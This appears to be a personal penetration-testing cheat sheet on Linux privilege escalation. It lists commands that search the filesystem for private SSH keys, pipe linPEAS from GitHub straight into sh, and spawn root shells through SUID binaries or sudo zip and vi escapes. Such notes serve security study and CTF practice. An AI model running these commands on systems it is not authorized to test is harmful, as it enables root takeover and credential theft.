> For the complete documentation index, see [llms.txt](https://notes.frozensoliddesigns.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.frozensoliddesigns.com/privilege-escalation/linux.md).

# Linux

* `sudo -l` to see what sudo can do
* search for anything owned by the user or groups they are in

```
find / -user [username] 2>/dev/null | grep -v 'proc\|sys\|run'
```

* [gtfobins.github.io](https://gtfobins.github.io/)
* linPEAS

```sh
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

* get suid binaries:&#x20;

```bash
find / -perm -u=s -type f 2>/dev/null
```

* Search for SSH keys

```bash
grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null
```

* launching shell from suid binary, use `exec /bin/sh -p` to keep effective uid from being reset
  * in the case of one machine, there was a binary `.suid_bash`, the command `./.suid_bash -p` gave a root shell
* weird zip command if for some reason you have sudo zip privs: `sudo zip test.zip test.txt -T --unzip-command="sh -c /bin/bash"` -T tests the integrity of the zip, then --unzip-command specifies the command to unzip the file, so it uses that in the integrity check
* check sudo environment variables
* from sudo vi - `:!sh` to launch shell
* check ports for nfs `rpcinfo -p`
* checking strings in files
  * `strings [file]`
    * try `-e l` also

## Checking local listeners

```bash
ss -tunlp
```
